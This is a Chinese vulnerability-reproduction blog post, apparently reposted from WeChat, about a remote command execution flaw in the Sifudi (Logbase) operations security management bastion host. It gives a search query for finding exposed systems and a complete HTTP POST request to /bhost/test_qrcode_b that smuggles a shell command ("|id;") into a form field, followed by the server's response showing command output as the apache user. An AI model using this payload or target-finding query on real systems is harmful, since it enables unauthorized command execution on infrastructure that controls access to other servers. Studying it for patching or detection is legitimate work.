【漏洞复现】思福迪运维安全管理系统 test_qrcode_b 远程命令执行漏洞

admin

102369
文章

87
评论

2024年3月6日07:45:58评论27 views1字数 614阅读2分2秒阅读模式

漏洞介绍

思福迪运维安全管理系统是思福迪开发的一款运维安全管理堡垒机。思福迪运维安全管理系统 test_qrcode_b 远程命令执行漏洞。

资产收集

web.body="Logbase运维安全管理系统"

【漏洞复现】思福迪运维安全管理系统 test_qrcode_b 远程命令执行漏洞

漏洞复现

【漏洞复现】思福迪运维安全管理系统 test_qrcode_b 远程命令执行漏洞

构造请求包

POST /bhost/test_qrcode_b HTTP/1.1Host: User-Agent: Go-http-client/1.1Content-Length: 23Accept-Encoding: gzipConnection: closeContent-Type: application/x-www-form-urlencodedReferer: https://xxx.xxx.xxx.xxx z1=1&z2="|id;"&z3=bhost

返回包

HTTP/1.1 200 OKServer: nginxDate: Tue, 05 Mar 2024 02:05:29 GMTContent-Type: text/html; charset=utf-8Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomainsContent-Length: 48

uid=93(apache) gid=100(users) groups=100(users)

【漏洞复现】思福迪运维安全管理系统 test_qrcode_b 远程命令执行漏洞

原文始发于微信公众号（Devil安全）：【漏洞复现】思福迪运维安全管理系统 test_qrcode_b 远程命令执行漏洞

左青龙
微信扫一扫

右白虎
微信扫一扫

【漏洞复现】思福迪运维安全管理系统 test_qrcode_b 远程命令执行漏洞

漏洞介绍

二次注入简单介绍

CVE-2024-2389 命令执行漏洞(附EXP)

CVE-2024-4040 CrushFTP 中的身份验证绕过和任意文件读取

利用 PUT 方法导致三星远程代码执行 (RCE)

泛微E-Mobile 6.0 client.do 命令执行漏洞

【在野0day】某友CRM系统某接口存在任意文件下载（大量资产存在）

【漏洞复现】短视频矩阵营销系统 ajax_uplaod接口处存在任意文件上传

漏洞速递 | Microsoft微软最新RCE漏洞（附EXP）

通达OA down 未授权员工信息泄露漏洞

漏洞预警 | FFmpeg释放后使用漏洞

发表评论

在线咨询

微信